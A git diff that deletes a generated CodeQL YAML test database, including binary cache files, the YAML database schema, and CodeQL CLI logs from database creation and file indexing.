9fc567e5c0691ecfc1890d2dc38b0fa83b5e39ea..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 RcmZQzU|?hbf<~j}b^ruC0lxqM diff --git a/ql/lib/test-db/db-yaml/default/yaml_scalars.rel b/ql/lib/test-db/db-yaml/default/yaml_scalars.rel deleted file mode 100644 index 573ab48b75431cf7a24d52077aa8a0371ccb9604..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 552 zcmXZZT}whi7)9Z^Pt&Z#N)6J?Oe;}D{K$-m5D_Fqq^m$eM8u1b@YlO{tphLX;h;0l z7($4I|K~tC#8EYlW9l*XyCgnRQ#hfXV}CY-Pt;3%s$StUwSfJ-BEC>dIIUK&*L%QO zwT``B1LxEx&Z{kat#+{YdcxlS1$&)We5<};uk()Y)B*N7LtIuz*uQy6PT_`T2frSa3&%>NXE@BAD4&KKC{TjH*|!anO7`@h>@-~SKx8MnBn K{^DnKhx>avaT2`% diff --git a/ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum b/ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum deleted file mode 100644 index 7aae4dc38a0fef1277b98a50776a547dd54eafc3..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 RcmZQzU|?hbf(z-A{{aQN0#N_} diff --git a/ql/lib/test-db/db-yaml/yaml.dbscheme b/ql/lib/test-db/db-yaml/yaml.dbscheme deleted file mode 100755 index 20d83c71ee67..000000000000 --- a/ql/lib/test-db/db-yaml/yaml.dbscheme +++ /dev/null @@ -1,80 +0,0 @@ -/*- YAML -*/ - -#keyset[parent, idx] -yaml (unique int id: @yaml_node, - int kind: int ref, - int parent: @yaml_node_parent ref, - int idx: int ref, - string tag: string ref, - string tostring: string ref); - -case @yaml_node.kind of - 0 = @yaml_scalar_node -| 1 = @yaml_mapping_node -| 2 = @yaml_sequence_node -| 3 = @yaml_alias_node -; - -@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; - -@yaml_node_parent = @yaml_collection_node | @file; - -yaml_anchors (unique int node: @yaml_node ref, - string anchor: string ref); - -yaml_aliases (unique int alias: @yaml_alias_node ref, - string target: string ref); - -yaml_scalars (unique int scalar: @yaml_scalar_node ref, - int style: int ref, - string value: string ref); - -yaml_errors (unique int id: @yaml_error, - string message: string ref); - -yaml_locations(unique int locatable: @yaml_locatable ref, - int location: @location_default ref); - -@yaml_locatable = @yaml_node | @yaml_error; - -/*- Files and folders -*/ - -/** - * The location of an element. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `file`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ -locations_default( - unique int id: @location_default, - int file: @file ref, - int beginLine: int ref, - int beginColumn: int ref, - int endLine: int ref, - int endColumn: int ref -); - -files( - unique int id: @file, - string name: string ref -); - -folders( - unique int id: @folder, - string name: string ref -); - -@container = @file | @folder - -containerparent( - int parent: @container ref, - unique int child: @container ref -); - -/*- Source location prefix -*/ - -/** - * The source location of the snapshot. - */ -sourceLocationPrefix(string prefix : string ref); diff --git a/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json b/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json b/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/ql/lib/test-db/log/database-create-20240203.101754.571.log b/ql/lib/test-db/log/database-create-20240203.101754.571.log deleted file mode 100644 index 8c7f3e173b71..000000000000 --- a/ql/lib/test-db/log/database-create-20240203.101754.571.log +++ /dev/null @@ -1,275 +0,0 @@ -[2024-02-03 10:17:54] This is codeql database create ql/lib/test-db -l yaml -s ql/lib/test -[2024-02-03 10:17:54] Log file was started late. -[2024-02-03 10:17:54] [PROGRESS] database create> Initializing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. -[2024-02-03 10:17:54] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/seclab/projects/actions/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db -[2024-02-03 10:17:54] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson -[2024-02-03 10:17:54] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/.codeqlmanifest.json -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby/codeql-extractor.yml. -[2024-02-03 10:17:54] Plumbing command codeql resolve languages completed: - { - "aliases" : { - "c" : "cpp", - "c++" : "cpp", - "c-c++" : "cpp", - "c-cpp" : "cpp", - "c#" : "csharp", - "java-kotlin" : "java", - "kotlin" : "java", - "javascript-typescript" : "javascript", - "typescript" : "javascript" - }, - "extractors" : { - "go" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go" - } - ], - "python" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python", - "extractor_options" : { - "logging" : { - "title" : "Options pertaining to logging.", - "description" : "Options pertaining to logging.", - "type" : "object", - "properties" : { - "verbosity" : { - "title" : "Python extractor logging verbosity level.", - "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", - "type" : "string", - "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" - } - } - } - } - } - ], - "java" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java", - "extractor_options" : { - "exclude" : { - "title" : "A glob excluding files from analysis.", - "description" : "A glob indicating what files to exclude from the analysis.\n", - "type" : "string" - }, - "add_prefer_source" : { - "title" : "Whether to always prefer source files over class files.", - "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction (experimental).", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "html" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html" - } - ], - "xml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml" - } - ], - "properties" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties" - } - ], - "cpp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp", - "extractor_options" : { } - } - ], - "swift" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift" - } - ], - "csv" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv" - } - ], - "yaml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml" - } - ], - "csharp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip|brotli)$" - } - } - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction.", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "cil" : { - "title" : "Whether to enable CIL extraction.", - "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "javascript" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript", - "extractor_options" : { - "skip_types" : { - "title" : "Skip type extraction for TypeScript", - "description" : "Whether to skip the extraction of types in a TypeScript application", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "ruby" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip)$" - } - } - } - } - } - ] - } - } -[2024-02-03 10:17:54] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test -[2024-02-03 10:17:54] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. -[2024-02-03 10:17:54] [DETAILS] database init> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . -[2024-02-03 10:17:54] [PROGRESS] database init> Calculated baseline information for languages: (53ms). -[2024-02-03 10:17:54] [PROGRESS] database init> Resolving extractor yaml. -[2024-02-03 10:17:54] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. -[2024-02-03 10:17:54] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. -[2024-02-03 10:17:54] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. This in-progress database is ready to be populated by an extractor. -[2024-02-03 10:17:54] Plumbing command codeql database init completed. -[2024-02-03 10:17:54] [PROGRESS] database create> Running build command: [] -[2024-02-03 10:17:54] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --index-traceless-dbs --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db -[2024-02-03 10:17:54] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh. -[2024-02-03 10:17:54] [PROGRESS] database trace-command> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh] -[2024-02-03 10:17:55] [build-stderr] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... -[2024-02-03 10:17:55] [build-stderr] /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... -[2024-02-03 10:17:55] [build-stderr] Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/working/files-to-index13033409879197263775.list] -[2024-02-03 10:17:55] Plumbing command codeql database trace-command completed. -[2024-02-03 10:17:55] [PROGRESS] database create> Finalizing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. -[2024-02-03 10:17:55] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db -[2024-02-03 10:17:55] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db... -[2024-02-03 10:17:55] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/yaml.dbscheme -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/trap/yaml -[2024-02-03 10:17:55] Clearing disk cache since the version file /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache/version does not exist -[2024-02-03 10:17:55] Tuple pool not found. Clearing relations with cached strings -[2024-02-03 10:17:55] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache in mode clear. -[2024-02-03 10:17:55] Sequence stamp origin is -6222583512417648685 -[2024-02-03 10:17:55] Pausing evaluation to hard-clear memory at sequence stamp o+0 -[2024-02-03 10:17:55] Unpausing evaluation -[2024-02-03 10:17:55] Pausing evaluation to quickly trim disk at sequence stamp o+1 -[2024-02-03 10:17:55] Unpausing evaluation -[2024-02-03 10:17:55] Pausing evaluation to zealously trim disk at sequence stamp o+2 -[2024-02-03 10:17:55] Unpausing evaluation -[2024-02-03 10:17:55] Trimming completed (7ms): Purged everything. -[2024-02-03 10:17:55] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/trap/yaml -[2024-02-03 10:17:55] Found 2 TRAP files (2.87 KiB) -[2024-02-03 10:17:55] [PROGRESS] dataset import> Importing TRAP files -[2024-02-03 10:17:55] Importing test.yml.trap.gz (1 of 2) -[2024-02-03 10:17:55] Importing sourceLocationPrefix.trap.gz (2 of 2) -[2024-02-03 10:17:55] [PROGRESS] dataset import> Merging relations -[2024-02-03 10:17:55] Merging 1 fragment for 'files'. -[2024-02-03 10:17:55] Merged 8 bytes for 'files'. -[2024-02-03 10:17:55] Merging 1 fragment for 'folders'. -[2024-02-03 10:17:55] Merged 80 bytes for 'folders'. -[2024-02-03 10:17:55] Merging 1 fragment for 'containerparent'. -[2024-02-03 10:17:55] Merged 80 bytes for 'containerparent'. -[2024-02-03 10:17:55] Merging 1 fragment for 'yaml_scalars'. -[2024-02-03 10:17:55] Merged 552 bytes for 'yaml_scalars'. -[2024-02-03 10:17:55] Merging 1 fragment for 'yaml'. -[2024-02-03 10:17:55] Merged 1416 bytes (1.38 KiB) for 'yaml'. -[2024-02-03 10:17:55] Merging 1 fragment for 'locations_default'. -[2024-02-03 10:17:55] Merged 1416 bytes (1.38 KiB) for 'locations_default'. -[2024-02-03 10:17:55] Merging 1 fragment for 'yaml_locations'. -[2024-02-03 10:17:55] Merged 472 bytes for 'yaml_locations'. -[2024-02-03 10:17:55] Merging 1 fragment for 'sourceLocationPrefix'. -[2024-02-03 10:17:55] Merged 4 bytes for 'sourceLocationPrefix'. -[2024-02-03 10:17:55] Saving string and id pools to disk. -[2024-02-03 10:17:55] Finished importing TRAP files. -[2024-02-03 10:17:55] Read 13.45 KiB of uncompressed TRAP data. -[2024-02-03 10:17:55] Relation data size: 3.93 KiB (merge rate: 52.86 KiB/s) -[2024-02-03 10:17:55] String pool size: 2.05 MiB -[2024-02-03 10:17:55] ID pool size: 1.03 MiB -[2024-02-03 10:17:55] [PROGRESS] dataset import> Finished writing database (relations: 3.93 KiB; string pool: 2.05 MiB). -[2024-02-03 10:17:55] Pausing evaluation to close the cache at sequence stamp o+3 -[2024-02-03 10:17:55] The disk cache is freshly trimmed; leave it be. -[2024-02-03 10:17:55] Unpausing evaluation -[2024-02-03 10:17:55] Plumbing command codeql dataset import completed. -[2024-02-03 10:17:55] [PROGRESS] database finalize> TRAP import complete (447ms). -[2024-02-03 10:17:55] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db -[2024-02-03 10:17:56] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... -[2024-02-03 10:17:56] [PROGRESS] database cleanup> TRAP files cleaned up (4ms). -[2024-02-03 10:17:56] [PROGRESS] database cleanup> Cleaning up scratch directory... -[2024-02-03 10:17:56] [PROGRESS] database cleanup> Scratch directory cleaned up (1ms). -[2024-02-03 10:17:56] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml -[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml. -[2024-02-03 10:17:56] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache in mode trim. -[2024-02-03 10:17:56] Sequence stamp origin is -6222583510647662597 -[2024-02-03 10:17:56] Pausing evaluation to zealously trim disk at sequence stamp o+0 -[2024-02-03 10:17:56] Unpausing evaluation -[2024-02-03 10:17:56] Trimming completed (3ms): Trimmed disposable data from cache. -[2024-02-03 10:17:56] Pausing evaluation to close the cache at sequence stamp o+1 -[2024-02-03 10:17:56] The disk cache is freshly trimmed; leave it be. -[2024-02-03 10:17:56] Unpausing evaluation -[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. -[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml -[2024-02-03 10:17:56] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml (5ms). -[2024-02-03 10:17:56] Plumbing command codeql dataset cleanup completed. -[2024-02-03 10:17:56] Plumbing command codeql database cleanup completed with status 0. -[2024-02-03 10:17:56] [PROGRESS] database finalize> Finished zipping source archive (578.00 B). -[2024-02-03 10:17:56] Plumbing command codeql database finalize completed. -[2024-02-03 10:17:56] [PROGRESS] database create> Successfully created database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. -[2024-02-03 10:17:56] Terminating normally. diff --git a/ql/lib/test-db/log/database-index-files-20240203.101755.239.log b/ql/lib/test-db/log/database-index-files-20240203.101755.239.log deleted file mode 100644 index 858ec59a13da..000000000000 --- a/ql/lib/test-db/log/database-index-files-20240203.101755.239.log +++ /dev/null @@ -1,15 +0,0 @@ -[2024-02-03 10:17:55] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db -[2024-02-03 10:17:55] Log file was started late. -[2024-02-03 10:17:55] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. -[2024-02-03 10:17:55] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... -[2024-02-03 10:17:55] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --format=json -[2024-02-03 10:17:55] [PROGRESS] resolve files> Scanning /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... -[2024-02-03 10:17:55] Plumbing command codeql resolve files completed: - [ - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test/test.yml" - ] -[2024-02-03 10:17:55] [DETAILS] database index-files> Found 1 files. -[2024-02-03 10:17:55] [PROGRESS] database index-files> /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... -[2024-02-03 10:17:55] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. -[2024-02-03 10:17:55] [PROGRESS] database index-files> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/working/files-to-index13033409879197263775.list] -[2024-02-03 10:17:55] Terminating normally. diff --git a/ql/lib/test-db/src.zip b/ql/lib/test-db/src.zip deleted file mode 100644 index 3dbf073c49924685cbbad30b59944af574c77ae9..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 578 zcmWIWW@Zs#;Nak3unBUGU_b)iKz3+xYEiL%L3v(DYH>+wk$!P%a!z8BenC-wR%&ud zv3_E5NoIatv3_!XN@`(_E{t24qo0$Rqz}>rCiE(Eb6SH=7admM+4Ebw}@-&*HCX*mO-(<>9jurcV|DmT#ZViIkhd$??4S(D4@jEe#GH zLQ}rY-Mre`mRS<8;aoAyhp>O}l|q-Aya^WjAv z%^yDeS19qFwD3&e-ivQz|0Q-uY`&Q}r|!?E8*|RR+su$Qv0+zf@ZJtR^@49DGYywj zum^ava}-DO?zLiMVA#RLz!2cg$Rxsmh%{t5P^6&(Dn?;|H!B;+a7G}k1k#&<4q{*c E0HyckLI3~& diff --git a/ql/src/test-db/baseline-info.json b/ql/src/test-db/baseline-info.json deleted file mode 100644 index 9e26dfeeb6e6..000000000000 --- a/ql/src/test-db/baseline-info.json +++ /dev/null @@ -1 +0,0 @@ -{} \ No newline at end of file diff --git a/ql/src/test-db/codeql-database.yml b/ql/src/test-db/codeql-database.yml deleted file mode 100644 index 1dedebb70bed..000000000000 --- a/ql/src/test-db/codeql-database.yml +++ /dev/null @@ -1,10 +0,0 @@ ---- -sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test -baselineLinesOfCode: 0 -unicodeNewlines: false -columnKind: utf16 -primaryLanguage: yaml -creationMetadata: - cliVersion: 2.16.1 - creationTime: 2024-02-03T09:17:52.592220Z -finalised: true diff --git a/ql/src/test-db/db-yaml/default/cache/.lock b/ql/src/test-db/db-yaml/default/cache/.lock deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info deleted file mode 100644 index 0111728636533e2c31d7b0489e64f46bcd4d6cf2..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info deleted file mode 100644 index 9c1ea6cdeb296b714876d0e928d9978e9ec788c9..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 41 ZcmZQz00U+S1tA%s91sm=%ij{e1^@)e0qp<) diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info deleted file mode 100644 index 9cdb710dfd9490f67f5103cbab69eb12829f96b4..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 deleted file mode 100644 index 7bccaeb20c898fd660036bab54ae98c20280d0a3..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 